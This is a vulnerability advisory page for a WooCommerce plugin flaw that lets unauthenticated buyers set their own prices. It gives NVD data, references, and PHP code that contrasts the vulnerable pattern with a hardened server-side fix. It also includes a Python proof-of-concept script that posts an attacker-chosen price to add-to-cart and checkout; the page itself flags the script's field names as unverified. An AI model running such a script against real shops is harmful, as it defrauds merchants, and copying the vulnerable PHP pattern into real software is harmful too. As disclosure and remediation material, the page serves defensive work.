Security Vulnerability Report
CVE-2025-12115 CVSS 7.5 HIGH

CVE-2025-12115

Published: 2025-10-31 10:15:50
Last Modified: 2026-04-15 00:35:42

Description

The WPC Name Your Price for WooCommerce plugin for WordPress is vulnerable to unauthorized price alteration in all versions up to, and including, 2.1.9. This is due to the plugin not disabling the ability to name a custom price when it has been specifically disabled for a product. This makes it possible for unauthenticated attackers to purchase products at prices less than they should be able to.
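
The root cause is the CWE-602 pattern: the product page hides the custom-price input when the option is turned off for a product, but the server still honours a price field that a client posts anyway. The PHP below is an added illustration written for this page; it is not code from the WPC Name Your Price plugin or from its fix. The WooCommerce hook names are real, but the meta keys (_nyp_enabled, _nyp_min_price), the request field (nyp_price) and the callback names are assumptions. It shows the vulnerable pattern next to a hardened version that decides from product meta on the server, both when the item is added and again on every totals calculation.

```php
<?php
/**
 * Added example for CVE-2025-12115 (CWE-602), not the plugin's own code.
 * Hook names are real WooCommerce hooks; the meta keys, request field and
 * callback names below are assumptions made for illustration.
 */

/* ---- Vulnerable pattern: the server trusts a field the UI merely hid. ---- */

add_filter( 'woocommerce_add_cart_item_data', 'nyp_vuln_capture_price', 10, 2 );
function nyp_vuln_capture_price( $cart_item_data, $product_id ) {
    // The template only prints the input when the feature is enabled for the
    // product, but any client can still POST the field: the check lives in
    // the browser only, and $product_id is never consulted here.
    if ( isset( $_POST['nyp_price'] ) ) {
        $cart_item_data['nyp_price'] = (float) wp_unslash( $_POST['nyp_price'] );
    }
    return $cart_item_data;
}

add_action( 'woocommerce_before_calculate_totals', 'nyp_vuln_apply_price' );
function nyp_vuln_apply_price( $cart ) {
    foreach ( $cart->get_cart() as $item ) {
        if ( isset( $item['nyp_price'] ) ) {
            $item['data']->set_price( $item['nyp_price'] ); // attacker-chosen value
        }
    }
}

/* ---- Hardened pattern: decide from product meta, never from the request. ---- */

// Returns the allowed minimum for a product, or null when naming a price is
// disabled for it. Product meta is the authoritative state (assumed keys).
function nyp_safe_min_price( $product_id ) {
    if ( get_post_meta( $product_id, '_nyp_enabled', true ) !== 'yes' ) {
        return null;
    }
    return (float) get_post_meta( $product_id, '_nyp_min_price', true );
}

// 1. Reject the add-to-cart request outright when the posted price is not legitimate.
add_filter( 'woocommerce_add_to_cart_validation', 'nyp_safe_validate', 10, 3 );
function nyp_safe_validate( $passed, $product_id, $quantity ) {
    if ( ! isset( $_POST['nyp_price'] ) ) {
        return $passed; // no custom price posted: regular catalogue pricing applies
    }
    $min = nyp_safe_min_price( $product_id );
    if ( null === $min ) {
        wc_add_notice( 'Custom pricing is not available for this product.', 'error' );
        return false; // disabled on the server side: refuse rather than silently accept
    }
    $price = (float) wp_unslash( $_POST['nyp_price'] );
    if ( ! is_finite( $price ) || $price < $min ) {
        wc_add_notice( 'Price must be at least ' . wc_price( $min ), 'error' );
        return false;
    }
    return $passed;
}

// 2. Store the price only for products where the feature is actually enabled.
add_filter( 'woocommerce_add_cart_item_data', 'nyp_safe_capture_price', 10, 2 );
function nyp_safe_capture_price( $cart_item_data, $product_id ) {
    if ( isset( $_POST['nyp_price'] ) && null !== nyp_safe_min_price( $product_id ) ) {
        $cart_item_data['nyp_price'] = (float) wp_unslash( $_POST['nyp_price'] );
    }
    return $cart_item_data;
}

// 3. Re-check on every totals calculation: cart items live in the session, and
//    the merchant may have disabled the feature or raised the minimum since the
//    item was added. Anything that no longer qualifies falls back to catalogue price.
add_action( 'woocommerce_before_calculate_totals', 'nyp_safe_apply_price' );
function nyp_safe_apply_price( $cart ) {
    foreach ( $cart->get_cart() as $item ) {
        if ( ! isset( $item['nyp_price'] ) ) {
            continue;
        }
        $min = nyp_safe_min_price( $item['product_id'] );
        if ( null === $min || $item['nyp_price'] < $min ) {
            continue;
        }
        $item['data']->set_price( $item['nyp_price'] );
    }
}
```

The point of step 3 is that a one-time check at add-to-cart is not enough: WooCommerce recomputes prices from the session cart on every page load and at checkout, so the server-side decision has to be re-derived from product meta at that moment too, not replayed from data the client originally supplied.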

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Weakness
CWE-602 (Client-Side Enforcement of Server-Side Security)

Configurations (Affected Products)

WPC Name Your Price for WooCommerce <= 2.1.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. The request parameters it sends (the "price" and "wpc_name_your_price" fields on the add-to-cart request, and the bare "total" field on checkout) are not taken from the plugin source or from the references on this page and are unverified; confirm the real field names and endpoints against a test installation before relying on the script.
python
# CVE-2025-12115 PoC - WPC Name Your Price Bypass
# Description: Bypass price restriction to purchase products at lower prices
import requests

TARGET_URL = "https://vulnerable-site.com"
PRODUCT_ID = 123  # Replace with actual product ID
NORMAL_PRICE = 99.99
ATTACKER_PRICE = 1.00


def exploit_cve_2025_12115():
    """
    This PoC demonstrates how an attacker can bypass the 'Name Your Price'
    restriction on WooCommerce products that have this feature disabled.
    """
    session = requests.Session()

    # Step 1: Get product page to obtain session cookies
    product_url = f"{TARGET_URL}/?p={PRODUCT_ID}"
    response = session.get(product_url)
    response.raise_for_status()

    # Step 2: This script does not extract or send a nonce. If the target
    # requires one, pull it from the product page HTML here and add it to
    # the payload below.

    # Step 3: Craft malicious request to add item to cart with custom price
    # The vulnerability allows setting any price regardless of product settings
    cart_url = f"{TARGET_URL}/?wc-ajax=add_to_cart"
    payload = {
        "product_id": PRODUCT_ID,
        "quantity": 1,
        "price": ATTACKER_PRICE,               # Attacker-controlled price (unverified field name)
        "wpc_name_your_price": ATTACKER_PRICE  # Plugin-specific parameter (unverified field name)
    }
    response = session.post(cart_url, data=payload)

    # Step 4: Check the cart page. A 200 on the POST proves nothing; what
    # matters is whether the attacker price is the one now attached to the
    # cart line. Searching the rendered HTML for the formatted amount is a
    # heuristic and may need adjusting to the shop's currency format.
    cart_page = session.get(f"{TARGET_URL}/cart/")
    price_applied = f"{ATTACKER_PRICE:.2f}" in cart_page.text

    # Step 5: Checkout with manipulated price. Note that a real WooCommerce
    # checkout needs the full form (payment method, checkout nonce, etc.);
    # this request only illustrates the final step.
    checkout_url = f"{TARGET_URL}/checkout/"
    checkout_data = {
        "billing_first_name": "Attacker",
        "billing_last_name": "User",
        "billing_email": "attacker@example.com",  # placeholder address
        "total": ATTACKER_PRICE
    }
    response = session.post(checkout_url, data=checkout_data)

    print(f"[!] Exploit sent with price: ${ATTACKER_PRICE}")
    print(f"[*] Expected price: ${NORMAL_PRICE}")
    print(f"[*] Potential loss: ${NORMAL_PRICE - ATTACKER_PRICE} per item")
    print(f"[*] Attacker price visible in cart: {price_applied}")
    return price_applied and response.status_code == 200


if __name__ == "__main__":
    exploit_cve_2025_12115()

References

https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3386310%40wpc-name-your-price&new=3386310%40wpc-name-your-price&sfp_email=&sfph_mail= (WordPress.org plugin changeset 3386310 for wpc-name-your-price)
https://www.wordfence.com/threat-intel/vulnerabilities/id/f64bc3c4-da89-4470-8353-d490f8bec408?source=cve (Wordfence vulnerability advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-12115",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-31T10:15:49.990",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The WPC Name Your Price for WooCommerce plugin for WordPress is vulnerable to unauthorized price alteration in all versions up to, and including, 2.1.9. This is due to the plugin not disabling the ability to name a custom price when it has been specifically disabled for a product. This makes it possible for unauthenticated attackers to purchase products at prices less than they should be able to."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-602"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3386310%40wpc-name-your-price&new=3386310%40wpc-name-your-price&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f64bc3c4-da89-4470-8353-d490f8bec408?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}